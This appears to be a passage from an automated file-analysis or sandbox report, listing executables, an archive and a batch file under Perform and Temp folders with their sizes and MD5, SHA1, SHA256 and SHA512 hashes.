SHA512
48c59b1763cd387a8c5822a2848bce677200b498a9971c4091fc1c5ec8a8288fcdde3c439db830a9ca2a6e2b87c2fc399753e79e3714db33a154e189e75e1e1f

Download Submit
C:\Perform\update.exe

Filesize
1.1MB

MD5
0e4afc55e03f8fe26d82e054004c16a3

SHA1
e5560a6d10d11e84eb094561ae1ec1c4461dd2c7

SHA256
d250df329d47be781f3c765a861d5419679ff01ac8edfdb148e95c16e2b0300e

SHA512
48c59b1763cd387a8c5822a2848bce677200b498a9971c4091fc1c5ec8a8288fcdde3c439db830a9ca2a6e2b87c2fc399753e79e3714db33a154e189e75e1e1f

Download Submit
C:\Users\Admin\AppData\Local\Temp\1121.tmp\1132.tmp\1133.bat

Filesize
5KB

MD5
55f5a5033d59e83f200f78efd8cf9ffd

SHA1
b153b8f0da50ffc56996bafa0be0610cec8b9d99

SHA256
d7c9417cd55995d45e20bcb9ac046b0f04cf06486d12d689f515af9eaa097041

SHA512
9924e373453ad7b415aa6b505c7ad232294f44d68a3d7f8d68414bfacab11fc4678b4a03ed5d172b7f0eab9ef905a9e16e2d42b58ba62d11d1d1697760faf047

Download Submit
C:\Users\Admin\AppData\Local\Temp\7za.exe

Filesize
674KB

MD5
0184e6ebe133ef41a8cc6ef98a263712

SHA1
cb9f603e061aef833a2db501aa8ba6ba007d768e

SHA256
dd6d7af00ef4ca89a319a230cdd094275c3a1d365807fe5b34133324bdaa0229

SHA512
6fec04e7369858970063e94358aec7fe872886b5ea440b4a11713b08511ba3ebe8f3d9312e32883b38bae66e42bc8e208e11678c383a5ad0f7cc0abe29c3a8ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\files.7z

Filesize
3.5MB

MD5
6380cb936d9229799750c4416ad99a81

SHA1
d1efa33ab91b12e336190774e616f5e420979201

SHA256
f3ac47452bc79d0f0b1dbdc73d12f76bc54b2e0452ca5e5ad9a06ed6b77cc7ce

SHA512
3139a611f3cb143b96ab32c0492b91f457b9f29bc3b4f9fa807b89fe4ea874fb004de6f7d5816c0dd1b25bb44ed5fafbd74298152c579d5a68c04d0815675970

Download Submit
\Perform\Resources\NSudo.exe

Filesize
247KB

MD5
5cae01aea8ed390ce9bec17b6c1237e4

SHA1
3a80a49efaac5d839400e4fb8f803243fb39a513

SHA256
19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

SHA512
c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

Download Submit
\Perform\Resources\NSudo.exe

Filesize
247KB

MD5
5cae01aea8ed390ce9bec17b6c1237e4

SHA1
3a80a49efaac5d839400e4fb8f803243fb39a513

SHA256
19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

SHA512
c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

Download Submit
\Perform\update.exe

Filesize
1.1MB

MD5
0e4afc55e03f8fe26d82e054004c16a3

SHA1
e5560a6d10d11e84eb094561ae1ec1c4461dd2c7

SHA256
d250df329d47be781f3c765a861d5419679ff01ac8edfdb148e95c16e2b0300e

SHA512
48c59b1763cd387a8c5822a2848bce677200b498a9971c4091fc1c5ec8a8288fcdde3c439db830a9ca2a6e2b87c2fc399753e79e3714db33a154e189e75e1e1f

Download Submit